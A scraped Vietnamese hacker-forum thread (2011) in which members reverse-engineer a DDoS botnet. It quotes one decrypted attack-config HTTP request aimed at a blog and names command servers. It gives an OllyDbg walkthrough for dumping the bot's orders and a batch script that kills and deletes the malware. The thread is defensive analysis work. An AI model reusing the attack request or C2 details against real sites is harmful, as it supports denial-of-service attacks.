Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on. 
vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx]]>
/hvaonline/posts/list/39641.html#245488 /hvaonline/posts/list/39641.html#245488 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Fri, 12 Aug 2011 01:02:42 GMT\r\nIf-None-Match: "8452d86a-81ad-0731-a96e-83ce185a840d"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html http://danlambaovn.blogspot.com   Đây là 1 dòng config trong file http://net.iadze.com/showthread.php để DDOS, dùng con bot nằm vùng SbieMgm.dll. File showthread.php mới được mấy anh up lên webserver ngày 19-08-2011, 6:43PM. Sau khi ông nội ThangCuAnh tung cái tool để decode file backgrounds.jpg: DecodeJPG.exe lên mediafire, mấy anh nghĩ: đx, tiêu rồi, mình muốn đốt thằng nào, nó biết hết. Thôi, hy sinh thằng backgrounds.jpg đi, cứ để nó nằm đó trên net.iadze.com, nghi binh mà. Mình đặt thêm cái showthread.php mới để chứa mệnh lệnh DDOS. Lần này tao dùng mã hoá xxx gì đó của thư viện CryptoPP luôn, coi ThangCuAnh giãi mã ra không ? Hi hi, chết mày nhé ThangCuAnh, cho mày khóc tiếng Mán luôn. File ra lệnh đốt (hay "chích")) là file text, mấy anh làm như sau: a.txt -> a.gz -> mã hoá = crypto gì đó (em không quan tâm) -> thành showthread.php, up lên: http://net.iadze.com/showthread.php. Khi SbieMgm.dll run, nó download showthread.php về, giãi mã trên memory -> thành a.gz -> lưu xuống %Temp% -> gzunzip nó ra thành a.txt -> đọc lại a.txt -> delete a.txt và a.gz. Hì hì, giờ mấy anh thấy chổ "bị lũng" của mấy anh chưa ? Ông nội ThangCuAnh đặt breakpoint hay hàm API DeleteFileW, run luôn để SbieMgm.dll của mấy anh muốn múa gì thì múa =)). Khi breakpoint read, ThangCuAnh nhảy qua thư mục %Temp%, move hai cái file a.gz và a.txt đó qua chỗ khác (thực ra là xxx.tmp files), xong terminate debug process. Vậy là xong, mệnh lệnh "đốt" của mấy anh sờ sờ ra đó, chỉ cần notepad là đủ xem rồi. Em đã nói và góp ý mấy anh stl coder bao nhiêu lần, unzip mà cứ ghi xuống %temp% để unzip là tiêu rồi. Học lại các hàm của zlib đi, nói hoài :-( Hôm nay, cái link "đốt" danlambaovn.blogspot.com trên đã phần nào nói lên mấy anh là ai rồi. Link đầy đủ đây: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html Thay vì static analysic để viết tool decode, giờ ThangCuAnh nói với em, nó lười, chán RCE code mấy anh rồi, chơi dynamic analysic luôn cho nhanh.]]> /hvaonline/posts/list/39641.html#245494 /hvaonline/posts/list/39641.html#245494 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245502 /hvaonline/posts/list/39641.html#245502 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Hướng dẫn debug và lấy nội dung file showthread.php của stl bằng OllyDbg Mở file SbieMgm.dll mà tôi đã up lên mediafire, trong file FakeSandboxie_17_08_2011.zip: http://www.mediafire.com/?5w2rrwd08b8bg8r bằng OllyDbg, ver nào cũng được. Đặt breakpoint tại DeleteFileW (không cần đặt breakpoint cho DeleteFileA vì DeleteFileA cũng phải call DeleteFileW). Cho an toàn, đặt thêm breakpoint cho CreateProcessW. Sau đó, các bạn run (F9 hay g).
Khi OllyDbg break tại DeleteFileW, nhìn vào cửa sổ stack, các bạn sẽ thấy file xxx.tmp. Trên máy tôi, %Temp% là C:\Temp. Khoan F9, các bạn nhảy qua Explorer, chép cái file xxx.tmp đó qua chỗ khác. Xong chưa, rồi thì F9.
OllyDbg sẽ break lần 2, và trong cửa sổ stack, các bạn sẽ thấy 1 file xxx.tmp nữa. Tương tự, chép nó qua chổ khác, terminate OllyDbg, không cần debug nữa.
Trong hai file .tmp đó, có 1 file nhỏ và 1 file lớn, 1k và 4k. Dùng notepad mở file 4k lên, sẽ thấy nội dung "đốt chích" của mấy anh stl.
Mở file xxx.tmp nhỏ 1k với WinRAR, 7Zip hay WinZip cũng sẽ thấy nội dung như file vừa mở = Notepad.
Vậy là xong, coder stl code cho cố, vẽ rồng vẽ phượng cho phức tạp, thì chúng ta chỉ cần break vài phát là lòi ra hết. Chia buồn mấy anh stl nhé :-( Rút kinh nghiệm, đừng đặt mình ở vị trí coder, hãy đặt mình vào vị trí cờ rắc cơ như ThangCuAnh :-) ]]>
/hvaonline/posts/list/39641.html#245506 /hvaonline/posts/list/39641.html#245506 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245509 /hvaonline/posts/list/39641.html#245509 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245532 /hvaonline/posts/list/39641.html#245532 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hì hì, không dám đâu template. Mắc công mấy anh đó hùa nhau đập hội đồng là em tiêu luôn, bỏ vợ con + rau cỏ hết ;) 
Chào TQN, Tôi nghĩ sau sự việc này, hva cũng nên tổ chức những lớp như đề nghị ở trên nhằm phát triển đội ngũ phân tích giúp ngăn chặn việc tấn công Ddos sau này cho các trang mạng nói chung ở VN. (tôi cũng muốn tham gia...). LVD]]>
/hvaonline/posts/list/39641.html#245533 /hvaonline/posts/list/39641.html#245533 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet wrote:

TQN wrote:
Hì hì, không dám đâu template. Mắc công mấy anh đó hùa nhau đập hội đồng là em tiêu luôn, bỏ vợ con + rau cỏ hết ;) 
Chào TQN, Tôi nghĩ sau sự việc này, hva cũng nên tổ chức những lớp như đề nghị ở trên nhằm phát triển đội ngũ phân tích giúp ngăn chặn việc tấn công Ddos sau này cho các trang mạng nói chung ở VN. (tôi cũng muốn tham gia...). LVD 
"cái khó nó bó cái khôn" bạn để ý sẽ thấy không phải anh em HVA nào cũng full time giống như tụi STL được cả, việc RCE cũng đã chiếm quá nhiều thời gian của mấy bro đó rồi, + thêm HVA là 1 diễn đàn phi lợi nhuận nên việc tổ chức ra hẳng 1 lớp là điều rất khó. vụ việc STL tại sao mấy bro HVA phải đi theo bởi STL đã từng động tới HVA, va cũng động tới những thứ to hơn nữa đó là lòng tự tôn của con người nhất là người Việt Nam. Thực ra không cần phải thành lập lớp này lớp kia, mỗi thành viên HVA mỗi ngày chỉ cần bỏ 1h đồng hồ post cách phòng chống malware của anh TQN lên các forum mà mình biết, tham gia là được rồi.]]>
/hvaonline/posts/list/39641.html#245534 /hvaonline/posts/list/39641.html#245534 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.zynamics.com/bindiff.html, private share cho em một bản với. Bản leak 2.0 em có rồi, nhưng do core của nó = Java nên chạy cực kỳ chậm, cái máy cùi của em nó đơ luôn. Còn PatchDiff và DarunGrim2 em đang dùng, hàng free, nên có bug và compare không chính xác và thiếu một số tính năng cần thiết. Giờ mà bỏ mấy ngày code thêm tính năng, fix bug thì "quãi" quá !]]> /hvaonline/posts/list/39641.html#245539 /hvaonline/posts/list/39641.html#245539 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh wrote:

vndncn wrote:
Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on. 
vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx 
Cảm ơn, mình đã submit rồi, nhưng không biết up có sai gì không nữa. Dear Sir or Madam, Thank you for your submission. Your tracking number is 807098. Please always state your tracking number if contacting support. This email is automatically generated. Please do not reply to it. At the time the result of the technical analysis is ready we will send a reply including results. Additionally you will be able to see it online here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p&incidentid=807098 An overview of your previous submissions can be accessed here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p Sincerely yours, Avira Virus Lab Response Team Hello, This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst. If you are a licensed Kaspersky Lab customer, we recommend that you send the files to be scanned to the Virus Lab, using your profile: https://my.kaspersky.com/en/support/viruslab . This option is available for the Licensed Kaspersky Lab customers only. If you are not a Licensed Kaspersky Lab customer, please use the following link: http://support.kaspersky.com/virlab/helpdesk.html?LANG=en. This link sends your file to the Virus Lab for inspection. All the files submitted for scanning from unregistered addresses are verified in the common queue order. sbiesvc.exe This file is in process. Best Regards, Kaspersky Lab "10/1, 1st Volokolamsky Proezd, Moscow, 123060, RussiaTel./Fax: + 7 (495) 797 8700 http://www.kaspersky.com http://www.viruslist.com" Thank you for submitting suspicious file(s) to the Microsoft Malware Protection Center (MMPC). This email acknowledges that we have successfully received the following file(s) at Sunday, August 21, 2011 8:26 AM Pacific Time: File ======================================== SbieSvc.exe Your submission has been assigned ID MMPC11082119831261, you can view your submission at http://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=fb355812-8815-4bf3-8054-122d451228fa Please keep this email and ID for future reference. Customers who are logged into our portal when they submit the sample(s) can later check the status of the submitted file(s) by viewing their submission history page. The MMPC will analyze the file(s) that you submitted to determine if they contain malware or other potentially unwanted software. If any file(s) in your submission are identified as either, the MMPC will add detection and publish definition updates after testing and certification. ======================================== Additional Help For customers who do not have an antivirus solution, Microsoft Security Essentials can be downloaded at no charge here: http://www.microsoft.com/security_essentials/ Information about top threats and the most up-to-date definition updates for all of Microsoft's Security related products are available on the MMPC portal at: http://www.microsoft.com/security/portal/ Additional support options for IT professionals and home users are available at the following websites: For IT Professionals - http://support.microsoft.com/gp/securityitpro For Home Users - http://support.microsoft.com/default.aspx?pr=securityhome Thank you, Microsoft Malware Protection Center ]]>
/hvaonline/posts/list/39641.html#245546 /hvaonline/posts/list/39641.html#245546 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245547 /hvaonline/posts/list/39641.html#245547 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245550 /hvaonline/posts/list/39641.html#245550 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Virus removal tool nhỏ để quét và diệt các STL virus- trojan trong hệ thống trong đó có AcrobatUpdater.exe, jarlib.dll (đi kèm với AcrobatUpdater.exe), SbieSvc.exe, SbieMgm.dl (đi kèm với SbieSvc.exe), MsHelpCenter.exe, ...............(đi kèm với MsHelpCenter.exe)... vân vân thì hay hơn và có dấu ấn của các chuyên gia bảo mật VN. Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance. Các file MsHelpCenter.exe, AcrobatUpdater.exe (newly modified) và SbieSvc.exe cần được gọi tên đúng là các "DDoS tool" được cài lén trong hệ thống, như các chuyên gia bảo mật quốc tế ở lĩnh vực này thường gọi như vậy(Khi submit tới các công ty antivirus ,xin dùng tên này để họ dễ nhận định). MsHelpCenter.exe đã đươc thử trên máy thử nghiệm của tôi, nhưng quá trình DDoS vào một mục tiêu nào đó không diễn ra. Lý do chưa được xác định. Đề nghị các bạn khác cùng tôi phối kiểm việc này. SbieSvc.exe (kèm với SbieMgm.dll) sắp được thử nghiệm trên máy của tôi. Có kết quả tôi sẽ thông báo cụ thể cho các bạn. -------- Riêng về file (process) của Trojan TRJ/hvadetec-1 (tức là newly revised AcrobatUpdater.exe) xin thông báo thêm một số thông tin bổ sung: 1- Sau khi tấn công vào webserver chính của HVA đặt tai Mỹ (website của HVA cùng hosting chung một webserver với tienve.org), TRJ/hvadetec-1 (AcrobatUpdater.exe) chuyển sang tấn công vào webserver mới của HVA, đặt tại Đức và sau cùng chuyển sang tấn công vào webserver thứ ba của HVA đặt tại Nhật. 2- Sở di STL DDoS tool tấn công vào các webserver khác nhau của HVA là do HVA đã chủ đông áp dụng kỹ thuật Round- robin (RR) DNS, để phân tải theo thời gian cho các webserver. Không phải là kỹ thuật mới, mà STL vừa áp dụng cho DDOS tool họ đâu! 3- Nhịp độ tấn công của STL DDoS tool trên một máy cũng khá nhanh và mạnh, có thể từ 4-10 kết nối trong một giây (tuỳ theo cấu hình máy mạnh hay yếu). Các gói tin DDoS tấn công vào mục tiêu đều là SYN packet, có dung lượng khoảng 62 Bytes. Tuy nhiên thưc tế trên mạng không có nhiều máy tham gia vào quá trình cùng DDoS vào HVA. Có nhiều lý do, trong đó có lý do là mạng bot của STL đã tổn thất nhiều và STL nhiều lúc đã mất khả năng điều khiển chúng. 4- Sau một thời gian hoat động (tấn công DDoS vào mục tiêu) các DDoS tool của STL (AcrobatUpdater.exe) dễ dàng rơi vào trạng thái "Loopback". Điều này xuất phát từ "lỗi kỹ thuật" rõ ràng trong quá trình biên soạn (code) process này. Ngoài ra TRJ/hvadetec-1 (AcrobatUpdater.exe) khi chạy chiếm một năng lưc rất lớn của CPU (khoảng từ 15-45 %- rất nhiều lúc là 42%). Do vậy khi user khởi phát một service khác, thí dụ xem video trên mạng hay quét virus hệ thống, thì tốc độ DDoS của AcrobatUpdater.exe chậm hẳn lai hoăc temporarily stopped. 5- TRong quá trình DDoS, TRJ/hvadetec-1 có kết nối với một webserver của STL để được update dữ liệu. Đó chính là webserver high.paploz.com mà anh TQN đã phát hiện trong quá trình RCE file AcrobatUpdater.exe, chứ không phải là http://net.iadze.com. Socket kết nôi đến cổng 80 TCP HTTP của webserver trên để download về máy nạn nhân file xv.jpg (xem hình minh hoạ). Trên máy thử nghiệm của tôi kết nối này xảy ra vào ngày 21-8-2011 (chủ nhật), nhưng khi kiểm tra file này trên máy và kiểm tra file xv.jpg này download từ high.paploz.com vào sáng hôm nay (22-8), thì khi mở ra nôi dung file này vẫn còn là: "2011-08-18 15:22:46" Đây là triệu chứng rõ ràng STL đã bối rối và mất dần quyền điều khiển mang bot của họ Xin xem thêm các hình minh hoạ: Tấn công DDoS vào webserver của HVA tại Đức
Tấn công DDoS vào webserver của HVA tại Nhật
TRJ/hvadetec-1 (AcrobatUpdater.exe) kết nối với high.paploz.com

]]>
/hvaonline/posts/list/39641.html#245551 /hvaonline/posts/list/39641.html#245551 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.google.com/sorry/misc/?continue=http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen? IP address: 113.xxx.xxx.xxx Time: 2011-08-22T07:07:53Z URL: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html]]>
/hvaonline/posts/list/39641.html#245554 /hvaonline/posts/list/39641.html#245554 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245557 /hvaonline/posts/list/39641.html#245557 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245558 /hvaonline/posts/list/39641.html#245558 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245561 /hvaonline/posts/list/39641.html#245561 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst wrote:
Hình như danlambaovn DIE rồi thì phải : Oops! Google Chrome could not connect to danlambaovn.blogspot.com Trong khi đó vào blogspot.com thì vẫn BT  
e ko biết có die ko nhưng e vào danlambao thì ko được bác ạ, còn vào cái Blogspot.com của e thì lại được, ko biết là thế nào nhỉ...e nghĩ danlambao khó die lắm..chắc có khi disable thôi..]]>
/hvaonline/posts/list/39641.html#245563 /hvaonline/posts/list/39641.html#245563 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o wrote:
Hay là các IP của VN bị lock hết rùi 
Vào bình thường mà bạn. Lỗi xảy ra do IP của bạn đang DDoS danlambaoxxx nên google chặn IP thôi. Mà VN xài IP chung nhiều nên đôi lúc máy bạn bị oan thôi. ]]>
/hvaonline/posts/list/39641.html#245565 /hvaonline/posts/list/39641.html#245565 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

XNoname01 wrote:

o.O.o wrote:
Hay là các IP của VN bị lock hết rùi 
Vào bình thường mà bạn. Lỗi xảy ra do IP của bạn đang DDoS danlambaoxxx nên google chặn IP thôi. Mà VN xài IP chung nhiều nên đôi lúc máy bạn bị oan thôi.  
đúng vậy, e thật là ngu..hxhx..e đổi sang dãy địa chỉ IP khác là vẫn vào được?? có thể do 1 trong các dãy e đã dùng gần giống với dãy bị chặn nên bị chặn...tưởng máy bị nhiễm "mèo què" của STL..hxhx]]>
/hvaonline/posts/list/39641.html#245567 /hvaonline/posts/list/39641.html#245567 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245569 /hvaonline/posts/list/39641.html#245569 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?z3atx20ilxpebop. Run nó, đừng hỏi em là run làm sao thì em bó tay luôn. Bat file này chỉ dùng lệnh dir, rd, del, tool reg.exe, sc.exe, taskkill.exe. Hầu như là có sẵn trên mọi máy hết. Text nó ở đây nếu các bạn down không được, chịu khó copy-paste-save nhé Code:
@echo off
echo ==========================================================================
echo Bat file to Kill some "meo que" of "song chet theo lenh" hec-co "lost-hat"
echo Code "bay ba cho vui" by ThangCuAnh - HVA
echo Ba con test, modify, bo sung thoa mai - No copyright
echo ==========================================================================

:Repeat

echo.
echo Kill and delete AcrobatUpdater.exe
echo.

taskkill /F /IM AcrobatUpdater.exe /T

dir "%AppData%\AcrobatUpdater.exe" /b /s
del "%AppData%\AcrobatUpdater.exe" /F /S
del "%AppData%\jarlib.dll" /F /S
rd  "%AppData%\Adobe\Updater6" /s /q

dir "%ProgramFiles%\AcrobatUpdater.exe" /b /S
del "%ProgramFiles%\AcrobatUpdater.exe" /F /S
del "%ProgramFiles%\jarlib.dll" /F /S
rd  "%ProgramFiles%\Adobe\Updater6" /s /q

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Acrobat Reader and Acrobat Manager" /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Acrobat Reader and Acrobat Manager" /f

echo.
echo Kill and delete SbieSvc.exe and SbieMgm.dll
echo.

taskkill /F /IM SbieSvc.exe /T
sc delete SbieSvc

dir "%AppData%\SbieSvc.exe " /b /s
del "%AppData%\SbieSvc.exe" /F /S
dir "%AppData%\SbieSvc.exe " /b /s
del "%AppData%\SbieSvc.exe" /F /S

dir "%ProgramFiles%\SbieSvc.exe" /b /S
del "%ProgramFiles%\SbieSvc.exe" /F /S
dir "%ProgramFiles%\SbieMgm.dll" /b /S
del "%ProgramFiles%\SbieMgm.dll" /F /S

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ALG /v Version /f

echo.
echo Kill and delete TeamViewer.exe, TeamViewer_Desktop.exe, uxtheme.manifest, themeui.manifest
echo.

taskkill /F /IM TeamViewer.exe /T
taskkill /F /IM TeamViewer_Desktop.exe /T

del "%ProgramFiles%\TeamViewer.exe" /F /S
del "%ProgramFiles%\uxtheme.manifest" /F /S

del "%ProgramFiles%\TeamViewer_Desktop.exe" /F /S
del "%ProgramFiles%\themeui.manifest" /F /S

del "%SystemDrive%\Program Files (x86)\TeamViewer.exe" /F /S
del "%SystemDrive%\Program Files (x86)\TeamViewer_Desktop.exe" /F /S

del "%WinDir%\uxtheme.manifest" /F /S
del "%WinDir%\themeui.manifest" /F /S

echo.
echo Press Ctrl-C to terminate & pause
goto Repeat
Em chỉ nghĩ đâu viết đó, test "sơ sơ", chưa kiểm tra errorlevel trả về, nên nó cứ cấm đầu cấm cổ chạy miệt mài, khi nào muốn thôi thì Ctrl-C. Xem kỹ các output xuất ra của nó nhé. Nghĩ cũng buồn cho mấy anh stl, nhân lực vậy, tiền bạc vậy, công sức bỏ ra biết bao nhiêu, vậy mà cuối cùng bị một cái bat file "tệ hơn vợ thằng Đậu" của ThangCuAnh vô danh nào đó, ở nơi khỉ ho cò gáy kill tất tần tật hết :-( ]]>
/hvaonline/posts/list/39641.html#245573 /hvaonline/posts/list/39641.html#245573 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil wrote:
Google chặn theo dải IP, đặc biệt là IP của VNPT, tình trạng này đc gần 2 tuần nay rồi. Tất nhiên có nhả ra, nhưng ko nhanh. Cũng là 1 dụng ý của STL, để hạn chế độc giả truy cập các blog "lề trái" *.blogspot.com :) Tuy nhiên các doanh nghiệp xài Mail host Google thì hơi phiền :P 
nghe bạn nói mình mới nhớ.2 ngày nay mail cua mình gửi cho địa chỉ gmail khùng khùng lắm lúc được lúc không. ps:tớ vẫn vào được các bác ah http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html]]>
/hvaonline/posts/list/39641.html#245574 /hvaonline/posts/list/39641.html#245574 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245575 /hvaonline/posts/list/39641.html#245575 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245579 /hvaonline/posts/list/39641.html#245579 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Chắc có lẽ đây cũng là một chủ ý của stl. DDOS không được thì "bố mày" khỏi vào xem luôn. Thâm hiểm thật ! Bà con down file killstlmeoque.cmd ở đây: http://www.mediafire.com/?z3atx20ilxpebop. Run nó, đừng hỏi em là run làm sao thì em bó tay luôn. Bat file này chỉ dùng lệnh dir, rd, del, tool reg.exe, sc.exe, taskkill.exe. Hầu như là có sẵn trên mọi máy hết. Text nó ở đây nếu các bạn down không được, chịu khó copy-paste-save nhé ............................................  
Hoan hô TQN Thưc ra cái công lớn ở đây là việc TQN tìm ra các file DDoS tool của STL. Chứ việc viết một STL Virus Removal tool thì không phải là khó hay công lao to tát gì. Nhưng nếu viết quen (như các bác ở BKAV hay CMC) thì viết nhanh và đủ hơn. Ngoài ra có một điểm lưu ý là nếu chỉ đơn thuần delete ngay các process hay file AcrobatUpdater.exe thôi thì hình như không được. Phải có thêm đông tác "ngắt" trước các kết nối của nó với các file và service khác ( như kiểu unlocker.exe làm ấy). Và sau đó phải cần reboot lai máy (vì AcrobatUpdater.exe luôn được load lên bộ nhớ của máy). Chắc các file (process) MsHelpCenter.exe cũng như vậy. Nên chắc TQN phải bổ sung thêm vài codes nữa ]]>
/hvaonline/posts/list/39641.html#245582 /hvaonline/posts/list/39641.html#245582 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ờ mà quên, chiều giờ vừa theo dõi giá vàng nhảy disco, vừa viết bat, vừa rce con exe giả doc của mấy anh stl, phát hiện một điều lý thú, nói luôn cho bà con: Bà con cẩn thận khi voice chat với em út bằng Yahoo, IM, Skype... Lỡ anh em nào hẹn họ em út đi KS thì cẩn thận, coi chừng mấy anh stl nghe hết và ập vào đấy. Nếu không (hay chưa) có gì thì mấy anh sẽ bonus cho 2 bao OK (đã xài rồi chứ có được bao mới đâu) là cũng tiêu mấy anh em luôn đấy. Hì hì ! Chơi bẩn, chơi xấu thiệt. stl coder dùng kỹ thuật hook voice này theo tui để chặn và lấy các file âm thanh mà nhiều người "lề trái" thu âm để up lên RFA, BBC... 
Cái này anh TQN phát hiện đáng giá lắm đấy nhé....người "lề trái" nên cẩn thận đề phòng..

angel_of_devil wrote:
YM, MSN thì ko nói, nhưng e nghĩ Skype có mã hoá mà anh?  
Ghi hết bạn ahj....YM, MSN hay Skype gì thì trên local PC cũng bị ghi hết cả (ví dụ đơn giản là có nhiều chương trình Recorder cho YM,MSN hay Skype đấy thôi.)]]>
/hvaonline/posts/list/39641.html#245589 /hvaonline/posts/list/39641.html#245589 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245591 /hvaonline/posts/list/39641.html#245591 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh wrote:

vndncn wrote:
Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on. 
vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx 
Email em có kết quả trả lời của Microsoft về những files virus STL được upload lên mediafire bởi anh TQN rồi nè mấy anh ơi. Analysis of the file(s) in Submission ID MMPC11082119831261 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/21/2011 8:26:46 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082119831261 Submitted Files ============================================= SbieSvc.exe [Trojan:Win32/Vietak.A] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A Your submission was scanned using antimalware definition version 1.111.426.0.]]>
/hvaonline/posts/list/39641.html#245592 /hvaonline/posts/list/39641.html#245592 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong. - taskkill: Kill process đang run của exe cần del. - sc delete: Delete service mà exe cần kill đăng ký - Xong xuôi, del nó đi là vừa. Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què". Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi. Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai. PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))  
lại còn dám doạ nạt cả thường dân vô tội . Đúng là người làm chuyện nhớn có khác chả từ thủ đoạn nào cả, nếu như chúng nó có bộ phận đảm nhiệm việc chuyên đi doạ nạt người khác thì không nó làm gì.Còn vì bức xúc với việc bị tụt quần code mà đem lòng ghen ghét hay (sợ hãi) gì thì đúng là bọn đầu lợn :)). người đã làm thì không sợ mà nếu sợ chúng nó thì đã chả dám làm. @TQN : hôm trước em tập RCE mấy cái File jad tìm được web này có khá nhiều tool RCE http://www.woodmann.com chia sẻ mọi người cùng tham khảo Link Tham khảo các Tool : http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools]]>
/hvaonline/posts/list/39641.html#245593 /hvaonline/posts/list/39641.html#245593 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 113.172.223.104 (IP của VDC), lúc 2:39 chiều, ngày hôm nay: 22-08-2011, là của thằng nào ? PM riêng cho em nhé !]]> /hvaonline/posts/list/39641.html#245596 /hvaonline/posts/list/39641.html#245596 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))  
Giỏi mà tối ngày lo code virus, malware... bị ai sai đâu đánh đó, rồi lo tìm cách lây nhiễm malware vào máy tính người khác( nhất là đồng bào VN không hiểu nhiều về máy tính) bằng nhiều hình thức gian tà, xảo huyệt.. của mấy anh để rồi chơi trò DDOS bẩn thỉu, hèn hạ của mấy anh ---> Mấy anh stl sao mà độc ác quá vậy, mấy anh có phải là con người không?--> Sống mà theo sự sắp đặt của kẻ khác thì sống có ý nghĩa gì chứ. Đấu kỷ thuật không lại rồi hù doạ anh em HVA àh --> đồ hèn hạ, mấy anh stl phải nên biết rằng: Thiên ngoại hữu thiên, nhân ngoại hữu nhân" chứ... Anh TQN, anh nên cẩn thận với bọn stl nhe anh. ]]>
/hvaonline/posts/list/39641.html#245600 /hvaonline/posts/list/39641.html#245600 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245604 /hvaonline/posts/list/39641.html#245604 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
